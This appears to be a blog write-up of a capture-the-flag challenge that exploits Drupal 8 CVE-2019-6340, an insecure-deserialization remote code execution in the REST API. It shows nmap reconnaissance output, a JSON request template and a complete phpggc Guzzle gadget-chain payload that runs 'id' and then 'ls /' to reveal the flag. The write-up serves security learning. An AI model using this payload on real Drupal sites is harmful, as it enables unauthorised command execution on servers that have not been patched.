Not so Blin D Rush CVE-2019-6340

The CVE

In short the Remote Code Execution happens due to insecure deserialization done by the REST API

Insecure Deserialization

In order to understand Insecure deserialization first understand what is serialization-deserialization.

Source : https://portswigger.net/web-security/deserialization

Challenge Solution

By visiting the challenge URL we see a post made by user optimusprime . However a quick look at the favicon suggests it is running on Drupal.

Blog Post by Optimus Prime
nmap -p 80 -T4 -A hostStarting Nmap 7.80 ( https://nmap.org ) at DATE IST
Nmap scan report for host
Host is up (0.000058s latency).
Other addresses for localhost (not scanned): ::1
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.41 ((Unix))
|_http-generator: Drupal 8 (https://www.drupal.org)
| http-robots.txt: 22 disallowed entries (15 shown)
| /core/ /profiles/ /README.txt /web.config /admin/
| /comment/reply/ /filter/tips /node/add/ /search/ /user/register/
| /user/password/ /user/login/ /user/logout/ /index.php/admin/
|_/index.php/comment/reply/
|_http-server-header: Apache/2.4.41 (Unix)
|_http-title: Home | Cybertron
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6.32
OS details: Linux 2.6.32
Network Distance: 0 hops
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.92 seconds
{
"link": [
{
"value": "link",
"options": "<SERIALIZED_CONTENT>"
}
],
"_links": {
"type": {
"href": "http://website.com/rest/type/shortcut/default"
}
}
}
phpggc guzzle/rce1 system id --jsonO:24:\"GuzzleHttp\\Psr7\\FnStream\":2:{s:33:\"\u0000GuzzleHttp\\Psr7\\FnStream\u0000methods\";a:1:{s:5:\"close\";a:2:{i:0;O:23:\"GuzzleHttp\\HandlerStack\":3:{s:32:\"\u0000GuzzleHttp\\HandlerStack\u0000handler\";s:2:\"id\";s:30:\"\u0000GuzzleHttp\\HandlerStack\u0000stack\";a:1:{i:0;a:1:{i:0;s:6:\"system\";}}s:31:\"\u0000GuzzleHttp\\HandlerStack\u0000cached\";b:0;}i:1;s:7:\"resolve\";}}s:9:\"_fn_close\";a:2:{i:0;r:4;i:1;s:7:\"resolve\";}}
The function unserialize() gets triggered code is executed
s:2:\”id\”
s:4:\”ls /\”
Contents of / directory
flag{blindrush_s@m_witwicky_is_0ur_l@st_h0p3}

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store